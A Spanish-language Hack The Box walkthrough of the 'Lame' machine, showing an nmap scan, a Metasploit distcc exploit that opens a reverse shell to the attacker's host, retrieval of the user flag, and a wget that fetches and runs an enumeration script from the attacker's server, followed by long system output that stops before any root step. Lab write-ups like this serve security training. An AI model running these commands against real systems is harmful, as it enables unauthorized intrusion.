[HTB] Lame

Hoy vamos a hackear la maquina de HTB llamada Lame. Esta catalogada como facil.

Video


Enumeration


Para empezar hacemos un nmap para ver que puertos tiene abiertos.

sml@m0nikE:~$ nmap -A -p- -Pn 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-02 14:52 CET
Nmap scan report for 10.10.10.3
Host is up (0.043s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.6
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.32 seconds
Vemos que hay varios puertos abiertos, y el mas "exotico" es el 3632 que corresponde al servicio de distccd, asi que tras buscar, vemos que existe un exploit para este servicio.

Exploitation


Configuramos metasploit para usar un exploit contra distccd.

msf5 > use exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR 
identifier, or hosts file with syntax 'file:'
   RPORT   3632             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf5 exploit(unix/misc/distcc_exec) > exploit

[*] Started reverse TCP double handler on 10.10.14.6:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo GtxuzicNJZBxaR0k;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "GtxuzicNJZBxaR0k\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.6:4444 -> 10.10.10.3:55000) at 
2019-11-02 15:00:50 +0100
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

user.txt


Ya tenemos una shell con pocos privilegios. Buscamos la flag de user.txt.

sh-3.2$ pwd
/home
sh-3.2$ ls
ftp  makis  service  user
sh-3.2$ cd makis
cd makis
sh-3.2$ ls
user.txt
sh-3.2$ cat user.txt
69454a937d94f5f0225ea00acd2e8XXX

Privilege Escalation


Descargamos un script para enumerar la maquina.

sh-3.2$ cd /tmp
sh-3.2$ wget http://10.10.14.6/lin.sh
wget http://10.10.14.6/lin.sh
--07:09:14--  http://10.10.14.6/lin.sh
           => `lin.sh'
Connecting to 10.10.14.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45,657 (45K) [application/octet-stream]

 0% [                                     ] 0             --.--K/s            
100%[====================================>] 45,657        --.--K/s             

07:09:14 (550.32 KB/s) - `lin.sh' saved [45657/45657]
Una vez descargado, lo ejecutamos para analizar el resultado.

sh-3.2$ sh lin	
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.971

[-] Debug Info
[+] Thorough tests = Disabled

Scan started at:
Wed Oct 30 07:09:19 EDT 2019

### SYSTEM ##############################################
[-] Kernel information:
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

[-] Kernel information (continued):
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 
4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"

[-] Hostname:
lame

### USER/GROUP ##########################################
[-] Current user/group info:
uid=1(daemon) gid=1(daemon) groups=1(daemon)

[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             pts/0    :0.0             Wed Oct 30 06:53:10 -0400 2019
makis            pts/1    192.168.150.100  Tue Mar 14 18:32:04 -0400 2017

[-] Who else is logged on:
 07:09:19 up 16 min,  1 user,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    :0.0             06:53   16:09m  0.00s  0.00s -bash

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(dhcp) gid=102(dhcp) groups=102(dhcp)
uid=102(syslog) gid=103(syslog) groups=103(syslog)
uid=103(klog) gid=104(klog) groups=104(klog)
uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=105(bind) gid=113(bind) groups=113(bind)
uid=106(postfix) gid=115(postfix) groups=115(postfix)
uid=107(ftp) gid=65534(nogroup) groups=65534(nogroup)
uid=108(postgres) gid=117(postgres) groups=117(postgres),114(ssl-cert)
uid=109(mysql) gid=118(mysql) groups=118(mysql)
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
uid=111(distccd) gid=65534(nogroup) groups=65534(nogroup)
uid=1002(service) gid=1002(service) groups=1002(service)
uid=112(telnetd) gid=120(telnetd) groups=120(telnetd),43(utmp)
uid=113(proftpd) gid=65534(nogroup) groups=65534(nogroup)
uid=114(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=115(snmp) gid=65534(nogroup) groups=65534(nogroup)
uid=1003(makis) gid=1003(makis) groups=1003(makis),4(adm),112(admin)

[-] It looks like we have some admin users:
uid=1003(makis) gid=1003(makis) groups=1003(makis),4(adm),112(admin)

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
makis:x:1003:1003::/home/makis:/bin/sh

[-] Super user account(s):
root

[+] We can sudo without supplying a password!
usage: sudo -h | -K | -k | -L | -l | -V | -v
usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
            {-i | -s | }
usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...

[-] Accounts that have recently used sudo:
/home/makis/.sudo_as_admin_successful

[+] We can read root's home directory!
total 80K
drwxr-xr-x 13 root root 4.0K Oct 30 06:53 .
drwxr-xr-x 21 root root 4.0K May 20  2012 ..
-rw-------  1 root root  373 Oct 30 06:53 .Xauthority
lrwxrwxrwx  1 root root    9 May 14  2012 .bash_history -> /dev/null
-rw-r--r--  1 root root 2.2K Oct 20  2007 .bashrc
drwx------  3 root root 4.0K May 20  2012 .config
drwx------  2 root root 4.0K May 20  2012 .filezilla
drwxr-xr-x  5 root root 4.0K Oct 30 06:53 .fluxbox
drwx------  2 root root 4.0K May 20  2012 .gconf
drwx------  2 root root 4.0K May 20  2012 .gconfd
drwxr-xr-x  2 root root 4.0K May 20  2012 .gstreamer-0.10
drwx------  4 root root 4.0K May 20  2012 .mozilla
-rw-r--r--  1 root root  141 Oct 20  2007 .profile
drwx------  5 root root 4.0K May 20  2012 .purple
-rwx------  1 root root    4 May 20  2012 .rhosts
drwxr-xr-x  2 root root 4.0K May 20  2012 .ssh
drwx------  2 root root 4.0K Oct 30 06:53 .vnc
drwxr-xr-x  2 root root 4.0K May 20  2012 Desktop
-rwx------  1 root root  401 May 20  2012 reset_logs.sh
-rw-------  1 root root   33 Mar 14  2017 root.txt
-rw-r--r--  1 root root  118 Oct 30 06:53 vnc.log

[-] Are permissions on /home directories lax:
total 24K
drwxr-xr-x  6 root    root    4.0K Mar 14  2017 .
drwxr-xr-x 21 root    root    4.0K May 20  2012 ..
drwxr-xr-x  2 root    nogroup 4.0K Mar 17  2010 ftp
drwxr-xr-x  2 makis   makis   4.0K Mar 14  2017 makis
drwxr-xr-x  2 service service 4.0K Apr 16  2010 service
drwxr-xr-x  3    1001    1001 4.0K May  7  2010 user

[-] Root is allowed to login via SSH:
PermitRootLogin yes

### ENVIRONMENTAL #######################################
[-] Environment information:
_DISTCC_SAFEGUARD=1
TERM=linux
QUIET=no
PATH=/sbin:/bin:/usr/sbin:/usr/bin
runlevel=2
RUNLEVEL=2
UPSTART_EVENT=runlevel
PWD=/tmp
VERBOSE=no
previous=N
PREVLEVEL=N
SHLVL=7
UPSTART_JOB=rc2
UPSTART_JOB_ID=5
_=/usr/bin/env

[-] Path information:
/sbin:/bin:/usr/sbin:/usr/bin

[-] Available shells:
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen

[-] Current umask value:
u=rwx,g=rx,o=rx
0022

[-] Password and storage information:
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  724 Apr  8  2008 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x  2 root root 4096 May 14  2012 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
-rw-r--r--  1 root root  492 Jan  6  2010 php5
-rw-r--r--  1 root root 1323 Mar 31  2008 postgresql-common

/etc/cron.daily:
total 60
drwxr-xr-x  2 root root 4096 Apr 28  2010 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
-rwxr-xr-x  1 root root  633 Feb  1  2008 apache2
-rwxr-xr-x  1 root root 7441 Apr 22  2008 apt
-rwxr-xr-x  1 root root  314 Apr  4  2008 aptitude
-rwxr-xr-x  1 root root  502 Dec 12  2007 bsdmainutils
-rwxr-xr-x  1 root root   89 Jun 19  2006 logrotate
-rwxr-xr-x  1 root root  954 Mar 12  2008 man-db
-rwxr-xr-x  1 root root  183 Mar  8  2008 mlocate
-rwxr-xr-x  1 root root  383 Apr 28  2010 samba
-rwxr-xr-x  1 root root 3295 Apr  8  2008 standard
-rwxr-xr-x  1 root root 1309 Nov 23  2007 sysklogd
-rwxr-xr-x  1 root root  477 Dec  7  2008 tomcat55

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Mar 16  2010 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r--  1 root root  102 Apr  8  2008 .placeholder

/etc/cron.monthly:
total 20
drwxr-xr-x  2 root root 4096 Apr 28  2010 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
-rwxr-xr-x  1 root root  664 Feb 20  2008 proftpd
-rwxr-xr-x  1 root root  129 Apr  8  2008 standard

/etc/cron.weekly:
total 24
drwxr-xr-x  2 root root 4096 Mar 16  2010 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
-rwxr-xr-x  1 root root  528 Mar 12  2008 man-db
-rwxr-xr-x  1 root root 2522 Jan 28  2008 popularity-contest
-rwxr-xr-x  1 root root 1220 Nov 23  2007 sysklogd

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts 
--report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts 
--report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts 
--report /etc/cron.monthly )
#

### NETWORKING  ##########################################
[-] Network and IP info:
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:86:fb  
          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:86fb/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:86fb/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:134051 errors:0 dropped:0 overruns:0 frame:0
          TX packets:635 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:9969857 (9.5 MB)  TX bytes:75030 (73.2 KB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:229 errors:0 dropped:0 overruns:0 frame:0
          TX packets:229 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:87089 (85.0 KB)  TX bytes:87089 (85.0 KB)

[-] ARP history:
? (10.10.10.2) at 00:50:56:B9:B5:67 [ether] on eth0

[-] Nameserver(s):
nameserver 10.10.10.2

[-] Default route:
default         10.10.10.2      0.0.0.0         UG    100    0        0 eth0

[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       
PID/Program name
tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:2049            0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:514             0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:50086           0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:46150           0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:8009            0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:6697            0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:1099            0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:48910           0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:8787            0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:8180            0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      
-               
tcp        0      0 10.10.10.3:53           0.0.0.0:*               LISTEN      
-               
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      
-               
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      
-               
tcp        0      0 0.0.0.0:45246           0.0.0.0:*               LISTEN      
-               
tcp6       0      0 :::2121                 :::*                    LISTEN      
-               
tcp6       0      0 :::3632                 :::*                    LISTEN      
-               
tcp6       0      0 :::53                   :::*                    LISTEN      
-               
tcp6       0      0 :::22                   :::*                    LISTEN      
-               
tcp6       0      0 :::5432                 :::*                    LISTEN      
-               
tcp6       0      0 ::1:953                 :::*                    LISTEN      
-               

[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       
PID/Program name
udp        0      0 0.0.0.0:2049            0.0.0.0:*                           
-               
udp        0      0 10.10.10.3:137          0.0.0.0:*                           
-               
udp        0      0 0.0.0.0:137             0.0.0.0:*                           
-               
udp        0      0 10.10.10.3:138          0.0.0.0:*                           
-               
udp        0      0 0.0.0.0:138             0.0.0.0:*                           
-               
udp        0      0 0.0.0.0:58001           0.0.0.0:*                           
-               
udp        0      0 0.0.0.0:49939           0.0.0.0:*                           
-               
udp        0      0 127.0.0.1:161           0.0.0.0:*                           
-               
udp        0      0 0.0.0.0:54187           0.0.0.0:*                           
-               
udp        0      0 10.10.10.3:53           0.0.0.0:*                           
-               
udp        0      0 127.0.0.1:53            0.0.0.0:*                           
-               
udp        0      0 0.0.0.0:33468           0.0.0.0:*                           
-               
udp        0      0 0.0.0.0:69              0.0.0.0:*                           
-               
udp        0      0 0.0.0.0:111             0.0.0.0:*                           
-               
udp        0      0 0.0.0.0:1018            0.0.0.0:*                           
-               
udp6       0      0 :::53                   :::*                                
-               
udp6       0      0 :::44491                :::*                                
-               

### SERVICES #############################################
[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.3   2844  1692 ?        Ss   06:52   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   06:52   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   06:52   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   06:52   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   06:52   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   06:52   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   06:52   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   06:52   0:00 [kblockd/0]
root        64  0.0  0.0      0     0 ?        S<   06:52   0:00 [kseriod]
root       181  0.0  0.0      0     0 ?        S    06:52   0:00 [pdflush]
root       182  0.0  0.0      0     0 ?        S    06:52   0:00 [pdflush]
root       183  0.0  0.0      0     0 ?        S<   06:52   0:00 [kswapd0]
root       224  0.0  0.0      0     0 ?        S<   06:52   0:00 [aio/0]
root      1244  0.0  0.0      0     0 ?        S<   06:52   0:00 [ksnapd]
root      1433  0.0  0.0      0     0 ?        S<   06:52   0:00 [ata/0]
root      1436  0.0  0.0      0     0 ?        S<   06:52   0:00 [ata_aux]
root      1445  0.0  0.0      0     0 ?        S<   06:52   0:00 [scsi_eh_0]
root      1449  0.0  0.0      0     0 ?        S<   06:52   0:00 [scsi_eh_1]
root      1462  0.0  0.0      0     0 ?        S<   06:52   0:00 [ksuspend_usbd]
root      1466  0.0  0.0      0     0 ?        S<   06:52   0:00 [khubd]
root      2330  0.0  0.0      0     0 ?        S<   06:52   0:00 [scsi_eh_2]
root      2513  0.0  0.0      0     0 ?        S<   06:52   0:00 [kjournald]
root      2688  0.0  0.1   2216   648 ?        S<  06:52   0:00 /sbin/udevd 
--daemon
root      3057  0.0  0.0      0     0 ?        S<   06:52   0:00 [kpsmoused]
root      3997  0.0  0.0      0     0 ?        S<   06:52   0:00 [kjournald]
daemon    4216  0.0  0.1   1836   524 ?        Ss   06:52   0:00 /sbin/portmap
statd     4234  0.0  0.1   1900   724 ?        Ss   06:52   0:00 /sbin/rpc.statd
root      4240  0.0  0.0      0     0 ?        S<   06:52   0:00 [rpciod/0]
root      4255  0.0  0.1   3648   560 ?        Ss   06:52   0:00 
/usr/sbin/rpc.idmapd
root      4482  0.0  0.0   1716   492 tty4     Ss+  06:52   0:00 /sbin/getty 
38400 tty4
root      4484  0.0  0.0   1716   484 tty5     Ss+  06:52   0:00 /sbin/getty 
38400 tty5
root      4490  0.0  0.0   1716   488 tty2     Ss+  06:52   0:00 /sbin/getty 
38400 tty2
root      4494  0.0  0.0   1716   488 tty3     Ss+  06:52   0:00 /sbin/getty 
38400 tty3
root      4497  0.0  0.0   1716   492 tty6     Ss+  06:52   0:00 /sbin/getty 
38400 tty6
syslog    4533  0.0  0.1   1936   648 ?        Ss   06:52   0:00 /sbin/syslogd 
-u syslog
root      4584  0.0  0.1   1872   544 ?        S    06:52   0:00 /bin/dd bs 1 
if /proc/kmsg of /var/run/klogd/kmsg
klog      4586  0.0  0.4   3288  2120 ?        Ss   06:52   0:00 /sbin/klogd -P 
/var/run/klogd/kmsg
bind      4611  0.0  1.4  35408  7680 ?        Ssl  06:52   0:00 
/usr/sbin/named -u bind
root      4635  0.0  0.1   5312  1024 ?        Ss   06:52   0:00 /usr/sbin/sshd
root      4716  0.0  0.2   2768  1304 ?        S    06:52   0:00 /bin/sh 
/usr/bin/mysqld_safe
mysql     4758  0.0  3.3 127560 17024 ?        Sl   06:52   0:00 
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql 
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 
--socket=/var/run/mysqld/mysqld.sock
root      4760  0.0  0.1   1700   560 ?        S    06:52   0:00 logger -p 
daemon.err -t mysqld_safe -i -t mysqld
postgres  4839  0.0  0.9  41340  5068 ?        S    06:52   0:00 
/usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c 
config_file=/etc/postgresql/8.3/main/postgresql.conf
postgres  4843  0.0  0.2  41340  1376 ?        Ss   06:52   0:00 postgres: 
writer process                                                                  
                                  
postgres  4844  0.0  0.2  41340  1188 ?        Ss   06:52   0:00 postgres: wal 
writer process                                                                  
                              
postgres  4845  0.0  0.2  41476  1404 ?        Ss   06:52   0:00 postgres: 
autovacuum launcher process                                                     
                                  
postgres  4846  0.0  0.2  12660  1152 ?        Ss   06:52   0:00 postgres: 
stats collector process                                                         
                                  
daemon    4866  0.0  0.0   2316   424 ?        SNs  06:52   0:00 distccd 
--daemon --user daemon --allow 0.0.0.0/0
daemon    4867  0.0  0.1   2316   556 ?        SN   06:52   0:00 distccd 
--daemon --user daemon --allow 0.0.0.0/0
root      4921  0.0  0.0      0     0 ?        S    06:52   0:00 [lockd]
root      4922  0.0  0.0      0     0 ?        S<   06:52   0:00 [nfsd4]
root      4923  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4924  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4925  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4926  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4927  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4928  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4929  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4930  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4934  0.0  0.0   2424   328 ?        Ss   06:52   0:00 
/usr/sbin/rpc.mountd
root      5002  0.0  0.3   5412  1724 ?        Ss   06:52   0:00 
/usr/lib/postfix/master
postfix   5003  0.0  0.3   5420  1644 ?        S    06:52   0:00 pickup -l -t 
fifo -u -c
postfix   5006  0.0  0.3   5460  1684 ?        S    06:52   0:00 qmgr -l -t 
fifo -u
root      5010  0.0  0.2   5388  1192 ?        Ss   06:52   0:00 /usr/sbin/nmbd 
-D
root      5012  0.0  0.2   7724  1476 ?        Ss   06:52   0:00 /usr/sbin/smbd 
-D
root      5016  0.0  0.1   7724   808 ?        S    06:52   0:00 /usr/sbin/smbd 
-D
snmp      5018  0.0  0.7   8488  3760 ?        S    06:52   0:00 
/usr/sbin/snmpd -Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 
127.0.0.1
root      5033  0.0  0.1   2424   864 ?        Ss   06:52   0:00 
/usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
daemon    5078  0.0  0.1   2316   560 ?        SN   06:52   0:00 distccd 
--daemon --user daemon --allow 0.0.0.0/0
daemon    5079  0.0  0.0   2316   216 ?        SN   06:52   0:00 distccd 
--daemon --user daemon --allow 0.0.0.0/0
proftpd   5081  0.0  0.3   9948  1596 ?        Ss   06:53   0:00 proftpd: 
(accepting connections)
daemon    5097  0.0  0.0   1984   420 ?        Ss   06:53   0:00 /usr/sbin/atd
root      5110  0.0  0.1   2104   900 ?        Ss   06:53   0:00 /usr/sbin/cron
root      5140  0.0  0.0   2052   352 ?        Ss   06:53   0:00 /usr/bin/jsvc 
-user tomcat55 -cp 
/usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar 
-outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid 
-Djava.awt.headless=true -Xmx128M 
-Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed 
-Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 
-Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager 
-Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy 
org.apache.catalina.startup.Bootstrap
root      5141  0.0  0.0   2052   480 ?        S    06:53   0:00 /usr/bin/jsvc 
-user tomcat55 -cp 
/usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar 
-outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid 
-Djava.awt.headless=true -Xmx128M 
-Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed 
-Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 
-Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager 
-Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy 
org.apache.catalina.startup.Bootstrap
tomcat55  5143  1.4 17.3 363988 89308 ?        Sl   06:53   0:14 /usr/bin/jsvc 
-user tomcat55 -cp 
/usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar 
-outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid 
-Djava.awt.headless=true -Xmx128M 
-Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed 
-Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 
